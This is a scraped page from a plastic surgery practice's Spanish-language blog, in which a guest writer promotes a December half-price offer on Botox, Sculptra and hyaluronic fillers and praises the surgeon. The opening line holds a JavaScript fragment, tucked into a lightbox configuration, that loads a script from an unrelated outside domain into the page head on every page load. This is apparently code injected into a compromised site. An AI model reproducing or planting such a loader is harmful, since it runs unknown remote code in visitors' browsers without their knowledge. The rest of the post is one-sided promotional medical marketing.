, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Joel R. Studin, MD, FACS
Cirugía Plástica y Estética
BLOG

December 7th , 2011

Trae a una amiga y ahorren en belleza!

Escrito por - Ms. New York Belleza Latina

Mis amigas siempre han estado ahí para reírse conmigo, me animan y aunque todos seamos diferentes, siempre complementamos. Al poco recibí un relleno Restylane, a pesar de la cortesía ”que no lo necesita”, todas me dijeron lo bien que me veía! Algunos de ellas también quería probarlo, pero el precio era lo que les impidió hacerlo. Es por eso que me da mucho gusto de compartir con ellas, y también con todos ustedes la FormaNueva promoción para Diciembre para la oficina del Dr. Studin. Durante el mes de Diciembre vienen con un amigo y ambos recibirán el 50% de descuento en inyectables.


¿Qué son inyectables?
Inyectables son procedimientos no quirúrgicos que incluyen Botox, Sculptra, Juvederm, Prevelle Silk y Restylane. De todos estos, el Botox es quizás el más conocido. Disminuye la apariencia de las arrugas relajando músculos hiperactivos. Un concepto erróneo es el que un médico debe inyectar en cada arruga. En realidad, el BOTOX Cosmético® es usado para el tratamiento de los músculos causantes de arrugas. Relajar los músculos próximos ayuda a disminuir el “estiramiento” y permites que la piel se vea más suave. Botox Cosmético, el músculos se relajará y la piel se alisará en un periodo de 10 días. El efecto durará aproximadamente seis meses, y puede ser repitido cuando sea necesario.

Fotos cortesía de Botox cosmético
  • Frente
  • Patas de Gallo
  • Líneas de Cejos
  • Holluelo de Barbilla
  • Arrugas de Labio Superior – Líneas de Fumador
  • Comisuras de Labios Hacia Abajo
  • Bandas de Cuellos
  • Sudor de Axilas

Otro inyectable, Sculptra, sustituye el colágeno perdido y te da resultados sutiles en el tiempo. Un mínimo de tres tratamientos se recomienda para rellenar las áreas donde la piel se adelgaza y la grasa se ha perdido. Estos tratamientos se realizan generalmente una vez al mes durante tres meses y luego una vez al año a partir de entonces. Sculptra es el ácido poli-L-láctico, una sustancia sintética. No es a partir de fuentes humanas o animales y no tienen un grado significativo de alergia asociada a ella por lo que una prueba de piel no es necesario.

Áreas de tratamiento son zonas de pliegues profundos como:

  • Lados de la boca
  • Lados de la nariz
  • Mejillas hundidas
  • Los pómulos

Juvederm, Prevelle Silk y Restylane, son rellenadors con Ácido Hialuronic, una substancia que se encuentra naturalmente en el cuerpo. De hecho, constituye la mayor parte del ojo y nuestro liquido de las articulaciones como así también rellena los espacios entre las células en todas partes. Estos rellenos son claros, de larga duración y muy indulgentes. Al ser claros, toman el color de su piel y también son excelentes para el aumento de labios. Estos son capaces de ser moldeados con los dedos poco después de ser inyectado, evitando el abultamiento temprano que estábamos acostumbrados a ver con el Colágeno. También duran más tiempo que el Colágeno.  Como dije antes, tuve una inyección de Restylane y yo no podía estar más feliz! Fue rápido, indoloro y de inmediato me vi los resultados.

Sobre el doctor:
Como mujer y como reina de belleza, me tomé el tiempo para investigar y asegurarme de quien quiera que lo dejé tocar mi cara, tenía la educación, la experiencia y las credenciales necesario para sentirme tranquila. También era bueno saber que Dr. Studin es bilingüe. Dr. Studin es conocido en su campo como innovador, un maestro y como un modelo para cirujanos plásticos. Ha practicado en el campo de la cirugía plástica desde 1985 y está certificado por la Junta Americana de Cirugía Plástica. Además de su práctica privada, el Dr. Studin está en el personal en el North Shore University Hospital – Glen Cove División y el Hospital St. Luke-Roosevelt, donde participa en la formación de cirujanos plásticos nuevos y es miembro de numerosas sociedades nacionales y regionales.

Traiga a un amiga y darle una oportunidad
Durate el mes de Diciembre la oficina de Dr. Studin tiene una promoción. Ven con un amigo y obtenga un 50% en ambos inyectables.  Si alguna vez quiso probar inyectables, pero estaban preocupados por el costo, ahora es el momento perfecto para hacerlo y llevar a un amigo que lo acompañe a la mitad del precio. Esta promoción sólo está disponible en la oficina de Great Neck, y usted tiene que ser un buen candidato para el procedimiento (inyectables). También aquellos de ustedes que son de Nueva York, si usted se convierte en un nuevo fan en Facebookque será ingresado automáticamente para tener la oportunidad de recibir una inyección gratis. Disfrute de una nueva imagen para las fiestas y el Año Nuevo!

Leave a Reply


Llame o envié un E-mail para una cita con el Dr. Studin
Haga Clic en Like para seguirnos en Facebook ¡Reciba descuentos exclusivos!
Desea mejorar su apariencia sin cirugía plástica? Esto puede ser solucionado con una visita durante su hora de almuerzo
Llame o envié un email para una cita con el Dr. Studin
¡Únase a 5,000+ subscriptores! Reciba los artículos más recientes en su correo electrónico. ¡Regístrese ahora!

American Society of Plastic Surgeons
The American Society for Aesthetic Plastic Surgery, Inc
American Board of Plastic Surgery